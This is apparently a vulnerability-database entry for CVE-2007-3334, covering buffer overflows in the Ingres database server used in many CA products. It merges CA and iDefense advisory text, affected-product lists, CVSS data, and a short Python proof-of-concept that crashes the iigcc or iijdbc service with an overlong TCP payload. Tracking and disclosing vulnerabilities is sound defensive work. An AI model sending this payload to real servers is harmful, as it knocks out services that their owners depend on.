var-200706-0395
Vulnerability from variot
Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High risk rating.
Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1
Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.
Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities
iDefense Security Advisory 06.21.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 21, 2007
I. BACKGROUND
Ingres is the database backend used by default in several CA products. The SCM (Secure Content Manager) is one of the products that uses Ingres. The SCM use Ingres to store quarantined virii and blocked HTTP requests/replies. For more information visit the following URLs.
http://www3.ca.com/solutions/Product.aspx?ID=1013
http://www.ingres.com/
II. The Communications Server is the main component responsible for receiving and handling requests from the network. The Data Access Server is responsible for handling requests from the Ingres JDBC Driver and .NET data providers. These requests are decoded into Ingres internal formats and passed on to other components of the database server.
The application does not properly validate the length of attacker supplied data before copying it into a fixed size heap buffer. This leads to an exploitable condition.
III. ANALYSIS
Exploitation allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.
In order to exploit this vulnerability an attacker would have to send a malformed request to the database server. This requires the ability to establish a TCP session on port 10916 (iigcc) or 10923 (iigcd).
Exploitation has been demonstrated to be trivial.
IV. Previous versions may also be affected. In addition, any application that uses the Ingres Database may be vulnerable.
V. WORKAROUND
Employing firewalls or other access control methods can effectively reduce exposure to this vulnerability.
VI. VENDOR RESPONSE
CA has made fixes available for all supported CA products that embed Ingres. For more information consult CA's Security Alert at the following URL.
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3334 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
01/16/2007 Initial vendor notification 01/17/2007 Initial vendor response 06/21/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
Date: 2010-08-14
Author: fdisk
Version: 2.6
Tested on: Windows 2003 Server SP1 en
CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
Notes: Fixed in the last version.
please let me know if you are/were able to get code execution
import socket import sys
if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]
if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)
print service + " crashed"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0395",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database server",
"scope": "eq",
"trust": 1.8,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "r8"
},
{
"model": "windows",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "all windows",
"scope": null,
"trust": 0.6,
"vendor": "microsoft",
"version": null
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter advanced systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust network forensics",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates docserver",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath aion bre",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor storage resource manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor storage command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for hp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for aix",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:etrust_secure_content_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ingres:database_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3334",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2007-3334",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-3334",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2007-3334",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-357",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 